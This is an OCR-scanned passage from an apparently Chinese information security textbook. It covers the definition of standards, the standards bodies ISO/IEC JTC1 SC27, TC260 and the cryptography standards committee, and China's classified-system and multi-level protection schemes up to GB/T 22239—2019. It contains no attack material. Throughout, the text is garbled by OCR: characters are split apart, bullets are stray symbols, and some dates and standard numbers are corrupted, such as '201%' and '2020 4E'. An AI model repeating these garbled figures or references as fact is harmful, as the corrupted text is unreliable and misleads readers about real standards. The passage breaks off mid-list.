其 结果 提供 规则 、 指 南 或 特性 , 供 共 同 使 用 和 重复 使 用 的 文件 。 标 准 化 是 为 了 在 既定 范围 
内 获得 最 佳 秩序 ,促进 共同 效益 ,对 现实 问题 或 潜在 问题 确立 共同 使 用 和 重复 使 用 的 条 款 
以 及 编制 .发 布 和 应 用 文件 的 活动 。 标 准 化 以 制定 ,发布 和 实施 标准 达到 统一 ,确立 条 款 
并 共同 遵循 ,来 实现 最 佳 效益 。 

从 定义 来 看 ,标准 是 标准 化 活动 的 结果 。 标 准 具 有 民主 性 ,是 各 利益 相关 方 协商 一 臻 
的 结果 ,反映 的 是 共同 意愿 ,而 不 是 个 别 利益 ;标准 具有 权威 性 ,标准 要 按照 规定 程序 制 
定 , 必 须 由 能 够 代表 各 方 利 益 ,并 为 社会 所 公认 的 权威 机 构 批准 发 布 ;标准 具有 系统 性 , 需 
要 协调 处 理 标 准 化 对 象 各 要 素 之 间 的 关系 ,统筹 考虑 使 系统 性 能 和 秩序 达到 最 佳 ;标准 具 
有 科学 性 ,来 源 于 人 类 社会 实践 活动 ,其 产生 的 基础 是 科学 研究 和 技术 进步 的 成 果 , 是 实 
践 经 验 的 总 结 。 

标准 比 法 律 柔软 , 比 道德 坚硬 , 比 产业 规划 细致 , 比 货币 政策 .财政 政策 微观 ,是 国家 
治理 体系 中 一 个 重要 内 容 , 与 其 他 国家 治理 工具 形成 良好 的 互补 。 标 准 对 促进 信息 通信 
技术 产业 发 展 及 推广 应 用 发 挥 着 极其 重要 的 作用 。 统 一 标准 是 互联 互通 、 信 息 共享 .业务 
协同 的 基础 。 如 果 没 有 标准 ,互联 网 不 会 发 展 到 今天 这 种 规模 ,比如 ,因特网 的 标准 化 工 
作 就 对 因特网 的 发 展 起 到 了 非常 重要 的 作用 。 
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标准 产生 的 基础 是 科学、 技术 和 经 验 的 综合 成 果 ”, 这 葛 定 了 标准 的 科学 性 和 先进 
性 。 标 准 的 产生 要 经 过 协商 一 致 制定 并 由 公认 机 构 批 准 。 协 商 一 致 是 指 普 遍 同意 ,表征 
为 对 实质 性 问题 ,有 关 重 要 方面 没有 坚持 反对 意见 ,并 且 按 程序 对 有 关 各 方面 的 观点 进行 
了 研究 和 对 争议 经 过 了 协调 。 协 商 一 致 并 不 意味 着 没有 异议 。 简 言 之 ,协商 一 致 是 指 有 
关 各 界 的 重要 一 方 对 标准 中 的 实质 性 问题 普遍 接受 ,没有 坚持 反对 意见 ,但 并 不 是 说 所 有 
各 方 全 无 异议 。 为 了 保证 标准 的 严肃 性 和 权威 性 ,标准 需 经 公认 机 构 批 准 ,这 是 非常 必要 
的 。 这 里 的 公认 机 构 , 自 然 是 权威 机 构 , 它 一 般 包 括 政府 主管 部 门 .标准化 组 织 或 团体 ( 包 
括 国际 组 织 或 区 域 组 织 ) ,从 事 标 准 化 工作 的 协会 或 学 会 等 。 

制定 标准 一 般 指 制 定 一 项 新 标准 ,是 指 制定 过 去 没有 而 现在 需要 进行 制定 的 标准 。 
它 是 根据 生产 发 展 的 需要 和 科学 技术 发 展 的 需要 及 其 水 平 来 制定 的 ,因而 反映 了 当前 的 
生产 技术 水 平 。 一 个 新 标准 制定 后 ,由 标准 批准 机 关 给 一 个 标准 编号 (包括 年 代号 ) ,同时 
标明 它 的 分 类 号 ,以 表明 该 标准 的 专业 隶属 和 制定 年 代 。 

修订 标准 是 指 对 一 项 已 在 生产 中 实施 多 年 的 标准 进行 修订 。 修 订 部 分 主要 是 生产 实 
践 中 反映 出 来 的 不 适应 生产 现状 和 科学 技术 发 展 那 一 部 分 ,或 者 修改 其 内 容 ,或 者 予以 补 
充 , 或 者 予以 删除 。 修 订 标准 不 改动 标准 编号 , 仅 将 其 年 代号 改 为 修订 时 的 年 代号 。 

在 我 国 ,依据 (中 华人 民 共 和 国标 准 化 法 ) 将 标准 划分 为 国家 标准 ,行业 标准 .地 方 标 
准 和 企业 标准 四 个 层次 级 别 。 各 层次 之 间 有 一 定 的 依从 关系 和 内 在 联系 ,形成 一 个 履 盖 
全 国 又 层次 分 明 的 标准 体系 。 此 外 ,为 适应 某 些 领域 标准 快速 发 展 和 快速 变化 的 需要 ,于 
1998 年 规定 的 四 级 标准 之 外 ,增加 了 一 种 “国家 标准 化 指导 性 技术 文件 ”, 作 为 对 国家 标 
准 的 补充 ,其 代号 为 “GB/Z”。 符 合 下 列 情况 之 一 的 项 目 ,可 以 制定 指导 性 技术 文件 : 
@@ 技 术 尚 在 发 展 中 ,需要 有 相应 的 文件 引导 其 发 展 或 具有 标准 化 价值 , 尚 不 能 制定 为 标准 
的 项 目 ;@ 采 用 国际 标准 化 组 织 、 国 际 电工 委员 会 及 其 他 国际 组 织 ( 包 括 区 域 性 国际 组 织 ) 
的 技术 报告 的 项 目 。 指 导 性 技术 文件 仅 供 使 用 者 参考 。 

依据 (中 华人 民 共和 国标 准 化 法 ) 的 规定 ,国家 标准 ,行业 标准 均 可 分 为 强制 性 和 推荐 
性 两 种 属性 的 标准 。 保 障 人 体 健康 、 人 身 、 财 产 安全 的 标准 和 法 律 , 行 政法 规 规定 强制 执 
行 的 标准 是 强制 性 标准 ,其 他 标准 是 推荐 性 标准 。 省 、 自 治 区 、 直 辖 市 标准 化 行政 主管 部 
门 制定 的 工业 产品 安全 、 卫 生 要 求 的 地 方 标准 ,在 本 地 区 域内 是 强制 性 标准 。 

强制 性 标准 是 由 法 律 规定 必须 遵照 执行 的 标准 。 强 制 性 标准 以 外 的 标准 是 推荐 性 标 
准 ,又 叫 非 强制 性 标准 。 推 荐 性 国家 标准 的 代号 为 “GB/T”, 强 制 性 国家 标准 的 代号 为 
"GB", 行业 标准 中 的 推荐 性 标准 也 是 在 行业 标准 代号 后 加 *“T” 字 ,如 *JB/T” 即 机 械 行 业 
推荐 性 标准 ,不 加 “T” 字 即 为 强制 性 行业 标准 。 


1.4.2 ”信息 安全 有 关 的 主要 标准 化 组 织 


1. 国际 化 标准 组 织 
1906 年 ,根据 国际 电工 会 议 的 决议 ,创立 了 世界 范围 的 标准 化 组 织 一 一 国际 电工 委 
员 会 (International Electrotechnical Commission. IEC)., 它 是 世界 上 最 早 的 国际 性 电工 
标准 化 机 构 。1918 一 1928 年 ,有 18 个 国家 正式 成 立 了 国家 标准 团体 。 这 些 机 构成 立 后 不 
久 , 就 开始 意识 到 通过 共同 协作 来 达到 标准 化 的 国际 性 协调 与 统一 的 必要 性 。1926 年 ， 
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国际 标准 化 协会 (ISA) 成 立 ,并 于 同年 成 立 了 国际 标准 化 组 织 (International Organization 
for Standardization,ISO) 。ISO 组 织 成 立 后 即 同 IEC 达成 协定 ,由 国际 电工 委员 会 担负 
电气 与 电子 工程 领域 的 标准 化 工作 ,并 由 国际 标准 化 组 织 担负 包括 除 电 气 与 电子 工程 以 
外 所 有 技术 领域 的 标准 化 工作 。 这 是 两 个 专门 从 事 标 准 化 工作 的 国际 组 织 , 它 们 的 活动 
范围 不 仅仅 在 工业 领域 ,而 且 在 某 种 程度 上 包括 农业 和 其 他 经 济 领域 。 目 前 ,国际 标准 化 
组 织 有 89 个 国家 的 标准 化 团体 成 员 。 

ISO 和 IEC 成 立 了 第 一 联合 技术 委员 会 JTC1(Join Technical Commission 1) 制 定 信 
息 技术 领域 国际 标准 ,下 辖 19 个 分 技术 委员 会 SCCub-technical Commission) 和 功能 标 
准 化 专门 组 SGFSCpecial Group for Functional Standardization) 等 特别 工作 小 组 ,还 有 4 
个 管理 机 构 , 即 一 致 性 评定 特别 工作 小 组 、 信 息 技 术 任务 组 .注册 机 构 特 别 工作 组 和 业务 
分 析 与 计划 特别 小 组 。 

SC27 是 JTC1 中 专门 从 事 信息 安全 通用 方法 及 技术 标准 化 工作 的 分 技术 委员 会 ,其 
工作 职责 包括 : 

CD 确定 信息 技术 系统 安全 服务 的 一 般 需 求 (包括 需求 的 方法 学 ); 

@ 研究 制定 相关 安全 技术 和 机 制 ( 包 括 登 记 规程 和 安全 部 件 间 的 相互 关系 ); 

@ 研究 制定 安全 指南 (如 说 明 性 的 文档 ,风险 分 析 等 ); 

@ 研究 制定 管理 支撑 文档 和 标准 (如 词汇 、 安 全 评估 准则 等 ); 

C 研究 制定 用 于 完整 性 、 鉴 别 和 抗 抵赖 性 等 服务 的 密码 算法 标准 ,同时 根据 国际 认 
可 的 策略 ,研究 并 制定 用 于 保密 性 服务 的 密码 算法 标准 。 

目前 ,SC27 下 设 三 个 工作 组 ,第 一 工作 组 (WG1) 为 需求 .安全 服务 及 指南 工作 组 ;第 
二 工作 组 (WG2) 为 安全 技术 与 机 制 工作 组 ;第 三 工作 组 (WG3) 为 安全 评估 准则 工作 组 。 

在 信息 安全 标准 化 方面 ,IEC 除了 同 ISO 联合 成 立 的 JTC1 下 属 几 个 分 委员 会 外 ,还 
在 电磁 兼容 等 方面 成 立 技术 委 员 会 ,并 制定 相关 国际 标准 ,如 信息 技术 设备 安全 (IEC 
60950) 。 与 信息 安全 标准 化 相关 的 技术 委员 会 有 : TC56- 可 靠 性 、TC74-IT 设备 安全 和 
功效 .TC77- 电 磁 兼 容 和 CISPR- 无 线 电 干扰 特别 委员 会 等 。 

美国 的 信息 技术 标准 主要 由 ANSI、NIST 制定 ,其 电子 工业 协会 EIA 和 通信 工业 协 
会 TIA 也 制定 了 部 分 信息 标准 。 欧 洲 的 ECMA 主要 在 世界 范围 内 制定 与 计算 机 及 计算 
机 应 用 有 关 的 标准 。IETF 主要 制定 与 因特网 有 关 的 标准 。 另 外 还 有 ITU.IEEE.EDTI 
和 OMG 等 组 织 , 负 责 制定 有 关 的 信息 技术 标准 。 

除 上 述 主要 标准 化 组 织 外 ,CEN/ISSS、ETSI、3GPP、3GPP2、OASIS 等 区 域 性 标准 
组 织 、 专 业 协 会 或 社会 团体 也 制定 了 一 些 安全 标准 .虽然 它们 不 是 国际 标准 ,但 由 于 其 制 
定 与 使 用 的 开放 性 ,部 分 标准 已 成 为 信息 产业 界 广泛 接受 和 采纳 的 事实 标准 。 


2. 我 国 的 标准 化 组 织 
1978 年 5 月 ,国务院 成 立 了 国家 标准 总 局 以 加 强 标 准 化 工作 的 管理 。 同 年 以 中 华人 
民 共 和 国名 义 参加 了 国际 标准 化 组 织 (ISO)。1979 年 7 月 ,国务院 颁发 了 《中 华人 民 共 和 
国标 准 化 管理 条 例 》。1988 年 12 月 29 日 ,第 七 届 全 国人 大 常委 会 第 五 次 会 议 通过 了 《中 
华人 民 共 和 国标 准 化 法 》, 并 以 国家 主席 令 颁 布 .于 1989 年 4 月 1 日 起 施行 ,这 标志 着 我 
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国 以 经 济 建设 为 中 心 的 标准 工作 进入 法 制 管理 的 新 阶段 。 党 的 十 八大 以 来 ,我 国 进入 到 
新 时 代 中 国 特色 社会 主义 建设 时 期 ,也 是 标准 化 事业 的 全 面 提升 期 ,这 一 时 期 党 中 央 国 务 
院 高 度 重视 标准 化 工作 。 习 近 平 总 书记 指出 , “标准 助 推 创新 发 展 ,标准 引领 时 代 进步 ” 
“中 国 将 积极 实施 标准 化 战略 ,以 标准 助力 创新 发 展 ,协调 发 展 .绿色 发 展 . 开 放 发 展 .共享 
发 展 ”。 要 求 必 须 加 快 形成 推动 高 质量 发 展 的 标准 体系 。 

(1) 全 国信 息 安 全 标准 化 技术 委员 会 

为 了 加 强 信息 安全 标准 化 工作 的 组 织 协调 力度 ,在 国家 质量 技术 监督 局 领导 下 ,国家 
标准 化 管理 委员 会 于 2002 年 批准 成 立 “ 全 国信 息 安全 标准 化 技术 委员 会 ”(National 
Information Security Standardization Technical Committee) ,简称 信安 标 委 ,委员 会 编号 
为 TC260 ,专门 从 事 信息 安全 标准 化 的 技术 工作 ,负责 全 国信 息 安 全 技术 、 安 全 机 制 、 安 
全 管理 .安全 评估 等 领域 的 标准 化 工作 ,统一 ,协调 .申报 信息 安全 国家 标准 项 目 ,组 织 国 
家 标准 的 送审 、 批 报 工作 ,向 国家 标准 化 管理 委员 会 提出 信息 安全 标准 化 工作 的 方针 、 政 
策 和 技术 措施 等 建议 。 

信安 标 委 下 设 7 个 工作 组 和 一 个 特别 工作 组 ,组 织 结构 如 图 1-11 所 示 。 


WG1 信 息 安 全 标准 体系 与 协调 工作 组 
[一 WG2 涉 密 信息 系统 安全 保密 标准 工作 组 


E ; 三 一 WG3 密 码 技术 标准 工作 组 

副 委 [| WG4 鉴 别 与 授权 标准 工作 组 

& 2 |—]| WG5 信 息 安全 评估 标准 工作 组 

| 一 | WwWG6 通 信安 全 标准 工作 组 
WG7 信 息 安 全 管理 标准 工作 组 


SWG-BDS 大 数据 安全 标准 特别 工作 组 
图 1-11 信安 标 委 组 织 结构 


(2) 密码 行业 标准 化 技术 委员 会 

为 满足 密码 领域 标准 化 发 展 需 求 ,充分 发 挥 密码 科研 、 生 产 \ 使 用 、 教 学 和 监督 检验 等 
方面 专家 的 作用 ,更 好 地 开展 密码 领域 的 标准 化 工作 ,2011 年 10 月 ,经 国家 标准 化 管理 
委员 会 和 国家 密码 管理 局 批准 ,成 立 “ 密 码 行业 标准 化 技术 委员 会 ”(Cryptography 
Standardization Technical Committee) ,以 下 简称 “ 密 标 委 ”(CSTC)。 

密 标 委 是 在 密码 领域 内 从 事 密码 标准 化 工作 的 非法 人 技术 组 织 , 归 口 国家 密码 管理 
局 领导 和 管理 ,主要 从 事 密 码 技术 、 产 品 、 系 统 和 管理 等 方面 的 标准 化 工作 。 密 标 委 委 员 
由 政府 ,企业 、 科 研 院 所 、 高 等 院 校 ,检测 机 构 和 行业 协会 等 有 关 方 面 的 专家 组 成 。 密 标 委 
目前 下 设 秘书 处 和 总 体 、 基 础 .应 用 、 测 评 四 个 工作 组 。 
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1.4.3 ”信息 安全 标准 


信息 安全 标准 是 确保 信息 安全 产品 和 系统 在 设计 .研发 .生产 、 建 设 、 使 用 、 测 评 中 保 
证 其 一 致 性 、 可 靠 性 、 可 控 性 的 技术 规范 和 技术 依据 。 没 有 科学 系统 的 信息 安全 标准 , 信 
息 化 建设 的 安全 可 靠 就 无 法 保证 ,就 难以 保证 国家 安全 和 国家 利益 。 信 息 安全 标准 在 信 
息 安全 保障 体系 建设 中 发 挥 着 基础 性 和 规范 性 的 作用 。 信 息 安全 标准 化 是 支撑 国家 信息 
安全 保障 体系 建设 ,关系 国家 信息 安全 的 大 事 , 各 个 国家 都 高 度 重视 信息 安全 标准 化 
工作 。 

我 国 从 20 世纪 80 年 代 开始 ,在 全 国信 息 技术 标准 化 技术 委员 会 信息 安全 分 技术 委 
员 会 和 各 部 门 的 努力 下 ,本 着 积极 采用 国际 标准 的 原则 ,转化 了 一 批 国际 信息 安全 基础 技 
术 标 准 ,为 我 国信 息 安全 技术 的 发 展 做 出 了 一 定 贡献 。 同 时 ,公安 部 、 国 家 安全 部 、 国 家 保 
密 局 、 国 家 密码 管理 委员 会 等 相继 制定 、 颁 布 了 一 批 信 息 安 全 的 行业 标准 ,为 推动 信息 安 
全 技术 在 各 行业 的 应 用 和 普及 发 挥 了 积极 的 作用 。 

截至 2020 4E 1 月 ,已 发 布 信息 安全 国际 标准 188 项 ,发 布 信息 安全 国家 标准 290 项 。 
这 里 重点 介绍 我 国 几 个 比较 典型 的 信息 安全 标准 。 


1.《 涉 及 国家 秘密 的 信息 系统 分 级 保护 管理 办 法 》 

2003 年 9 月 ,中 央 办 公 厅 、 国 务 院 办 公 厅 转发 的 (国家 信息 化 领导 小 组 关于 加 强 信息 
安全 保障 工作 的 意见 》( 中 办 发 C2003]27 号 ) 提 出 了 * 实 行 信 息 安全 等 级 保护 ”的 要 求 , 并 
指出 “对 涉及 国家 秘密 的 信息 系统 ,要 按照 党 和 国家 有 关 保 密 规 定 进行 保护 ”;2004 年 ,中 
共 中 央 保密 委员 会 印发 的 (关于 加 强 信息 安全 保障 工作 中 保密 管理 的 若干 意见 )( 中 保 委 
4 C200427 号 ) 明 确 提出 建立 涉 密 信息 系统 分 级 保护 制度 ;2005 年 ,国家 保密 局 印发 了 
《涉及 国家 秘密 的 信息 系统 分 级 保护 管理 办 法 》( 国 保 发 C(2005]16 号 ) 初 步 提 出 了 涉 密 信 
息 系统 分 级 保护 管理 办 法 :2006 年 2 月 ,四 部 委 又 联合 印发 4 信息 安全 等 级 保护 管理 办 法 
(试行 )( 公 通 字 [2006]7 号 )》, 制 定 了 信息 安全 等 级 保护 管理 办 法 ;2008 年 6 月 ,印发 了 
《信息 安全 等 级 保护 管理 办 法 》( 公 通 字 C2007]43 号 ) ,提出 了 信息 安全 等 级 保护 具体 的 管 
理 办 法 和 定 级 指导 意见 。 同 年 7 月 下 发 的 (关于 开展 全 国 重要 信息 系统 安全 等 级 保护 定 
级 工作 的 通知 》, 全 面 .系统 地 对 等 级 保护 工作 进行 了 部 署 。 根 据 管 理 办 法 , 涉 密 信息 应 当 
依据 信息 安全 等 级 保护 的 基本 要 求 , 按 照 有 关 涉 密 信息 系统 分 级 保护 的 管理 规定 和 技术 
标准 ,结合 系统 实际 情况 进行 保护 。 

涉 密 信息 系统 分 级 保护 是 指 涉 密 信息 系统 的 建设 使 用 单位 根据 分 级 保护 管理 办 法 和 
有 关 标 准 , 对 涉 密 信息 系统 分 等 级 实施 保护 。 因 此 , 涉 密 信息 系统 建设 使 用 单位 必须 充分 
了 解 分 级 保护 工作 方面 的 政策 要 求 ,并 熟练 掌握 和 运用 涉 密 信息 系统 分 级 保护 的 标准 。 

涉 密 信息 系统 分 级 保护 是 国家 信息 安全 等 级 保护 的 重要 部 分 , 涉 密 信息 系统 根据 涉 
密 程 度 ,按照 秘密 级 、 机 密级 ,绝密 级 进行 分 级 保护 ;凡是 用 于 处 理 \ 传 输 和 存储 国家 秘密 
的 信息 系统 (网 络 ) 都 应 按照 分 级 保护 的 要 求 进行 建设 .使 用 和 管理 。 

国家 保密 局 是 涉 密 信息 系统 分 级 保护 工作 的 主管 部 门 。 国 家 保密 工作 部 门 负责 全 国 
涉 密 信息 系统 分 级 保护 工作 的 指导 ,监督 和 检查 ;地 方 各 级 保密 工作 部 门 负责 本 行政 区 域 
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涉 密 信息 系统 分 级 保护 工作 的 指导 ,监督 和 检查 。 涉 密 信息 系统 的 建设 使 用 单位 则 负责 
本 单位 涉 密 信息 系统 分 级 保护 的 具体 实施 工作 。 

涉 密 信息 系统 建设 使 用 单位 应 依据 (涉及 国家 秘密 的 信息 系统 分 级 保护 管理 办 法 ) 确 
定 系 统 等 级 ,结合 本 单位 业务 需求 和 涉 密 信息 制定 安全 保密 需求 ,依据 国家 保密 标准 
BMB 17 一 2006《 涉 及 国家 秘密 的 信息 系统 分 级 保护 技术 要 求 》,BMB 20 一 2007《 涉 及 国家 
秘密 的 信息 系统 分 级 保护 管理 规范 ) 和 BMB 23 一 2008( 涉 及 国家 秘密 的 信息 系统 分 级 保 
护 方案 设计 指南 ) 的 要 求 设计 系统 安全 保密 方案 。 在 工程 实施 过 程 中 ,应 按照 BMB 18 一 
2006《 涉 及 国家 秘密 的 信息 系统 工程 监理 规范 》 的 要 求 进行 工程 监理 。 工 程 实施 结束 后 ， 
涉 密 信息 系统 建设 使 用 单位 应 当 向 保密 工作 部 门 提出 申请 ,由 国家 保密 局 的 涉 密 信息 系 
统 测评 机 构 依 据 国家 保密 标准 BMB 22 一 2007《 涉 及 国家 秘密 的 计算 机 信息 系统 分 级 保 
护 测评 指南 》, 对 涉 密 信息 系统 进行 安全 保密 测评 。 在 系统 投入 使 用 前 , 涉 密 信息 系统 建 
设 使 用 单位 应 当 按照 (涉及 国家 秘密 的 信息 系统 审批 管理 规定 》 向 国家 保密 工作 部 门 
申请 进行 系统 审批 , 涉 密 信 息 系 统 通过 审批 后 方 可 投入 使 用 。 已 投入 使 用 的 涉 密 信息 
系统 ,其 建设 使 用 单位 在 按照 分 级 保护 要 求 完 成 系统 整改 后 ,应 当 向 保密 工作 部 门 
备案 。 


2.《 信 息 系统 安全 等 级 保护 基本 要 求 》 

信息 安全 等 级 保护 的 基本 概念 见 ( 关 于 信息 安全 等 级 保护 工作 的 实施 意见 》( 公 通 字 
[2004]66 号 ),“ 是 指 对 国家 秘密 信息 及 公民 、 法 人 和 其 他 组 织 的 专 有 信息 以 及 公开 信息 
和 存储 ,传输 .处 理 这 些 信息 的 信息 系统 分 等 级 实行 安全 保护 ,对 信息 系统 中 使 用 的 信息 
安全 产品 实行 按 等 级 管理 ,对 信息 系统 中 发 生 的 信息 安全 事件 分 等 级 响应 、 处 置 "。 信 息 
安全 等 级 保护 的 核心 是 分 级 及 保护 。 

(1) 等 级 保护 1.0 时 代 

信息 安全 等 级 保护 最 基本 的 法 规 是 1994 年 的 国务 院 147 号 令 ( 中 华人 民 共 和 国 计 算 
机 信息 系统 安全 保护 条 例 》, 在 其 中 第 九条 规定 “计算 机 信息 系统 实行 安全 等 级 保护 ,安全 
等 级 的 划分 标准 和 安全 等 级 保护 的 具体 办 法 ,由 公安 部 会 同 有 关 部 门 制定 ”, 确 立 了 公安 
部 网 络 安 全 保卫 局 、 各 省 区 市 及 各 地 市 县 网 络 警 察 大 队 在 等 级 保护 工作 上 的 监督 管理 
职能 。 

为 规范 信息 安全 等 级 保护 的 实施 ,国家 制定 了 一 系列 技术 标准 ,其 中 最 主要 的 是 《 计 
算 机 信息 系统 安全 等 级 保护 划分 准则 》(GB 17859) ,在 这 个 基本 等 级 划分 标准 的 基础 之 
上 ,制定 了 一 整套 适合 技术 类 ,管理 类 及 产品 类 的 明细 划分 标准 。 等 级 保护 1.0 时 代 信 息 
系统 等 级 保护 相关 标准 主要 有 : GB/T 22239 一 2008《 信 息 系统 安全 等 级 保护 基本 要 求 》、 
GB/T 22240 一 2008《 信 息 系 统 安全 等 级 保护 定 级 指南 )、GB/T 25058 一 2008《 信 息 系 统 安 
全 等 级 保护 实施 指南 》、GB/T 25070 一 2010《 信 息 系 统 等 级 保护 安全 设计 要 求 》、GB/T 
28448 一 2012《 信 息 系 统 安全 等 级 保护 测评 要 求 》 和 GB/T 28449 一 2012《 信 息 系统 安全 等 
级 保护 测评 过 程 指 南 》。 

信息 系统 安全 等 级 保护 的 内 容 可 分 为 系统 定 级 、 系 统 备案 、 建 设 整改 .等 级 测评 、 监 
督 检查 五 个 方面 。 
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QD 系统 定 级 。 
依据 (信息 安全 等 级 保护 管理 办 法 兴 公 通 字 [2007]43 号 ) 的 第 七 条 ,信息 系统 的 安全 
保护 等 级 由 低 到 高 划分 为 五 级 : 第 一 级 是 信息 系统 受到 破坏 后 ,会 对 公民 、 法 人 和 其 他 组 
织 的 合法 权益 造成 损害 ,但 不 损害 国家 安全 、 社 会 秩序 和 公共 利益 ;第 二 级 是 信息 系统 受 
到 破坏 后 ,会 对 公民 、 法 人 和 其 他 组 织 的 合法 权益 产生 严重 损害 ,或 者 对 社会 秩序 和 公共 
利益 造成 损害 ,但 不 损害 国家 安全 ;第 三 级 是 信息 系统 受到 破坏 后 ,会 对 社会 秩序 和 公共 
利益 造成 严重 损害 ,或 者 对 国家 安全 造成 损害 ;第 四 级 是 信息 系统 受到 破坏 后 ,会 对 社会 
秩序 和 公共 利益 造成 特别 严重 损害 ,或 者 对 国家 安全 造成 严重 损害 ;第 五 级 是 信息 系统 受 
到 破坏 后 ,会 对 国家 安全 造成 特别 严重 损害 。 
由 此 可 见 , 信 息 系 统 的 分 级 主要 是 依据 对 国家 、 社 会 、 法 人 及 组 织 的 损害 程度 及 范围 
来 确定 的 ,损害 小 、 范 围 也 小 的 ,级 别 低 、 保 护 要 求 也 低 ; 损 害 大 ,范围 大 的 ,级 别 高 ,保护 的 
要 求 就 相应 增加 。 企 业 只 有 正确 理解 分 级 的 定义 ,对 照 出 本 企业 信息 系统 的 影响 大 小 及 
范围 ,才能 做 出 正确 的 定 级 。 
@ 系统 备案 。 
《信息 安全 等 级 保护 管理 办 法 ) 的 第 八条 对 不 同 级 别 的 信息 系统 做 了 明确 的 定 级 工作 
要 求 说 明 : 第 一 级 信息 系统 由 使 用 单位 自行 保护 ;第 二 级 信息 系统 由 使 用 单位 自行 保护 
的 同时 ,要 在 公安 机 关 备 案 ; 第 三 级 以 上 的 信息 系统 要 由 使 用 单位 依据 要 求 进行 保护 、 由 
公安 机 关 进 行 监督 管理 ,并 且 由 有 资质 的 机 构 进行 定期 测评 。 备 案 工 作 由 信息 系统 使 用 
单位 按照 (信息 安全 等 级 保护 备案 实施 细则 》 的 相关 要 求 办 理 。 对 于 不 符合 信息 安全 等 级 
保护 要 求 的 ,公安 机 关 会 通知 备案 单位 进行 相关 整改 ;对 于 符合 信息 安全 等 级 保护 要 求 
的 ,经 过 审核 合格 的 单位 ,公安 机 关 会 对 该 信息 系统 予以 备案 ,并 向 使 用 部 门 发 放 由 公安 
部 统一 监制 的 (信息 系统 安全 等 级 保护 备案 证 明 》。 
OQ 建设 整改 。 
为 有 效 保障 信息 化 的 健康 发 展 ,减少 信息 安全 隐患 和 信息 安全 事故 ,信息 系统 使 用 单 
位 应 采取 分 区 分 域 的 方法 开展 信息 系统 安全 建设 整改 ,对 信息 系统 进行 全 面 加 固 改造 升 
级 ,按照 信息 系统 保护 等 级 ,对 信息 系统 实施 安全 保护 。 
信息 系统 使 用 单位 应 对 照 (信息 系统 安全 等 级 保护 基本 要 求 》 中 的 内 容 ,开展 信息 系 
统 的 信息 安全 等 级 保护 安全 建设 整改 , 双 路 并 行 , 坚 持 管理 与 技术 并 重 ,从 物理 安全 主机 
安全 ,应 用 安全 、 网 络 安 全 及 数据 备份 与 恢复 五 个 安全 技术 相关 方面 进行 建设 整改 。 同 时 
也 要 从 安全 管理 人 员 ,安全 管理 机 构 、 安 全 管理 制度 、 系 统 建 设 管理 及 系统 运 维 管理 五 个 
安全 管理 相关 方面 开展 进行 。 技 术 与 管理 要 进行 协调 融合 发 展 ,从 而 建立 起 一 套 完整 的 
信息 系统 安全 防护 体系 。 
@ 等 级 测评 。 
测评 机 构 按 照 规定 程序 对 信息 系统 进行 等 级 测评 ,测评 后 会 按照 公安 部 制定 的 《信息 
系统 安全 等 级 测评 报告 模板 ) 出 具 定 级 测评 报告 ,包括 报告 摘要 ,测评 项 目 概述 、 被 测 信息 
系统 情况 、 等 级 测评 范围 与 方法 、 单 元 测评 、 整 体 测评 、 测 评 结果 汇总 风险 分 析 和 评价 、 等 
级 测评 结论 .安全 建设 整改 意见 等 内 容 。 
信息 安全 等 级 保护 测评 工作 结束 后 ,信息 系统 管理 人 员 可 以 完整 地 了 解 信息 系统 的 
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相关 安全 信息 ,深层 次 发 现 信息 系统 的 漏洞 ,彻底 排查 信息 系统 中 的 安全 隐患 ,并且 可 以 
明确 信息 系统 是 否 符合 等 级 保护 的 相关 要 求 , 是 否 具备 相应 的 安全 防护 能 力 。 

@ 监督 检查 。 

备案 单位 按照 相关 要 求 , 需 定期 对 信息 安全 等 级 保护 工作 的 落实 情况 进行 自 查 ,掌握 
信息 系统 安全 管理 和 相关 技术 指标 等 ,及 时 发 现 信息 系统 存在 的 安全 隐患 ,并 有 针对 性 地 
采取 正确 的 技术 方法 和 管理 措施 。 

公安 机 关 依 据 有 关 规 定 ,以 询问 情况 ,查阅 核对 资料 、 调 看 记录 资料 ,现场 查验 等 方式 
对 使 用 单位 的 等 级 保护 工作 进行 检查 ,对 其 等 级 保护 建设 的 信息 安全 措施 .相应 信息 安全 
管理 制度 的 建立 和 落实 、 信 息 安 全 责任 落实 责任 等 方面 进行 督促 检查 。 

(2) 等 级 保护 2.0 时 代 

《中 华人 民 共 和 国 网 络 安全 法 》 于 2017 年 6 月 1 日 起 施行 。 为 了 配合 (中 华人 民 共 和 
国 网 络 安 全 法 ) 的 实施 ,同时 适应 云 计 算 、 大 数据 、 物 联网 移动 互联 、 工 业 控 制 系统 等 新 技 
术 、 新 应 用 情况 下 ,网 络 安全 等 级 保护 工作 的 开展 , 需 对 GB/T 22239 一 2008 进行 修订 。 
修订 的 思路 是 针对 共性 保护 需求 提出 安全 通用 要 求 , 针 对 云 计 算 、 大 数据 、 物 联网 ,移动 互 
联 、 工 业 控 制 系统 等 新 技术 、 新 应 用 领域 的 个 性 化 安全 保护 需求 提出 安全 扩展 要 求 ,形成 
新 的 网 络 安全 等 级 保护 基本 要 求 标准 。 

目前 ,除了 《网 络 安全 等 级 保护 实施 指南 》 和 《网 络 安全 等 级 保护 定 级 指南 》 正 在 修订 
外 ,GB/T 22239 一 201% 网 络 安全 等 级 保护 基本 要 求 》GB/T 25070 一 201%( 网 络 安全 等 
级 保护 设计 技术 要 求 》GB/T 28448 一 2019《 网 络 安全 等 级 保护 测评 要 求 》、GB/T 
28449 一 2018( 网 络 安全 等 级 保护 测评 过 程 指南 》GB/T 36627 一 2018《 网 络 安全 等 级 保护 
测试 评估 技术 指南 》、.GB/T 36958 一 2018《 网 络 安全 等 级 保护 安全 管理 中 心 技术 要 求 》 和 
GB/T 36959 一 2018《 网 络 安全 等 级 保护 测评 机 构 能 力 要 求 和 评估 规范 ) 都 已 完成 编制 / 修 
订 并 发 布 。 

(3) GB/T 22239 一 2019《 信 息 安 全 技术 ”网络 安 全 等 级 保护 基本 要 求 》 

2019 年 5 月 10 日 ,GB/T 22239 一 2019《 信 息 安全 技术 网 络 安全 等 级 保护 基本 要 
求 ) 发 布 。GB/T 22239 一 2019 与 GB/T 22239—2008 相 比 ,重点 在 以 下 几 个 方面 进行 了 
修订 。 

CD 标准 名 称 的 变化 。 

标准 名 称 最 初 是 (信息 系统 安全 等 级 保护 基本 要 求 ), 后 改 为 (信息 安全 等 级 保护 基本 要 
求 ), 为 了 与 (中华 人民 共 和 国 网 络 安 全 法 ) 保 持 一 致 ,再 改 为 (网 络 安全 等 级 保护 基本 要 求 》。 

@ 等 级 保护 对 象 的 变化 。 

